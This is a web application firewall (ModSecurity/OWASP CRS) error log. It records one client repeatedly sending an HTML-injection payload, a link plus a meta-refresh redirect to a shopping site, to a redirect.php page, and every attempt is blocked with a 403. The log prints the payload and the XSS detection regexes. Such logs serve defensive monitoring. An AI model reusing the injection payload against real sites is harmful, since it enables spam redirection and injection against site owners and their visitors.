[Tue May 12 06:13:16.861605 2026] [security2:error] [pid 1820198:tid 1820202] [client 27.78.84.116:53135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo3M1tk6y7yBJLpJpD0wAAAII"]
[Tue May 12 06:13:20.819212 2026] [security2:error] [pid 1820198:tid 1820212] [client 43.160.241.129:55390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/protocole-informatique/p2p/"] [unique_id "agKo4M1tk6y7yBJLpJpD1gAAAIw"]
[Tue May 12 06:13:21.054022 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:21.054423 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:21.054580 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:21.054680 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:21.054865 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:21.055293 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:21.055579 2026] [security2:error] [pid 1842385:tid 1842411] [client 27.78.84.116:53490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo4Rs7kySIUZ3ORnIz8AAAARQ"]
[Tue May 12 06:13:27.328465 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:27.328833 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:27.329003 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:27.329127 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:27.329293 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:27.329667 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:27.329941 2026] [security2:error] [pid 1844863:tid 1844884] [client 27.78.84.116:53914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo5_aAnTZtx1_H_wzE8wAAAU8"]
[Tue May 12 06:13:32.928345 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:32.928752 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:32.928925 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:32.929037 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:32.929205 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:32.929619 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:32.929886 2026] [security2:error] [pid 1842385:tid 1842395] [client 27.78.84.116:54354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo7Bs7kySIUZ3ORnIz9gAAAQU"]
[Tue May 12 06:13:36.896360 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
